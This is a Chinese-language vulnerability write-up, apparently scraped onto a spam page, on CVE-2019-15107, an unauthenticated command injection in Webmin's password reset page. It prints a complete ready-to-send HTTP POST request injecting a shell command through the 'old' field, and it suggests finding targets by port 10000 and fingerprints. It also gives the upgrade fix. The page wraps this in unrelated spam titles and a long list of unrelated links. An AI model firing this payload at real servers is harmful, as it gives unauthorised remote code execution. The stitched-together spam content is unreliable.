当前位置: 首页 > news >正文

做货代在哪个网站找客源会计培训班多少钱

news 2025/8/12 14:33:33
做货代在哪个网站找客源,会计培训班多少钱,网上做预算有哪些网站,系统开发网站漏洞编号 CVE-2019-15107 漏洞描述 Webmin是一个基于Web的系统配置工具&#xff0c;用于类Unix系统。密码重置页面中存在此漏洞&#xff0c;允许未经身份验证的用户通过简单的 POST 请求执行任意命令。 影响版本 Webmin<1.920 漏洞评级 严重 利用方法&#xff08;利…

漏洞编号

CVE-2019-15107

漏洞描述

Webmin是一个基于Web的系统配置工具,用于类Unix系统。密码重置页面中存在此漏洞,允许未经身份验证的用户通过简单的 POST 请求执行任意命令。

影响版本

Webmin<=1.920

漏洞评级

严重

利用方法(利用案例)

参考链接:https://vulhub.org/#/environments/webmin/CVE-2019-15107/

构造payload

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

直接利用payload即可 

漏洞挖掘

可以根据网站指纹信息

10000是这个系统的默认端口,在目标网站访问这个url:/password_change.cgi

加固建议

升级到1.930版本

漏洞分类

远程代码执行漏洞

参考链接

Vulhub - 用于漏洞环境的 Docker-Compose 文件

 

http://www.mnyf.cn/news/34147.html

相关文章:

  • 网站做收付款接口google关键词工具
  • 传奇手游网站系统优化软件排行榜
  • iis做的网站其他电脑能看吗网络营销是网上销售吗
  • 创建网站的目的是什么原因网络推广的概念
  • 如何用网页设计制作个人网站网络推广方案
  • 什么是平台内部营销在运营中seo是什么意思
  • 安徽工程建设信息网站6培训机构加盟店排行榜
  • 如何制作网站中国站长素材网
  • 游戏网站建设的必要性湘潭网站建设
  • 万年网站建设疫情最新资讯
  • 建筑公司网站案例关键词推广效果分析
  • 企业网站群建设的原因互联网推广渠道有哪些
  • 做外贸需要网站百度刷排名优化软件
  • 手机建行网站百度推广渠道代理
  • pc端网站建设cps广告联盟
  • 做 网站 要专线吗百度站长平台官网
  • wix做的网站在国内访问不媒体资源
  • 河北高端网站建设专业做seo推广
  • 大学生做网站新网站怎么快速收录
  • 朔州网站建设千峰培训可靠吗?
  • 网站建设公司兴田德润优惠西安seo服务培训
  • 网站从建设到运行要多少钱怎么在网上做广告
  • 幼儿园行风建设网站用稿资料广告投放渠道有哪些
  • 怎么做有图有声的网站seo关键词优化哪个平台好
  • seo课程多少钱杭州网站seo价格
  • 机械做卖产品网站网站优化推广教程
  • 龙岗做网站的公司郑州seo代理外包公司
  • 日本做a片在线观看网站有哪些百度资源分享网
  • 360安全网站怎么做号码认证品牌设计公司排名前十强
  • 济南莱芜又出新情况了seo排名怎样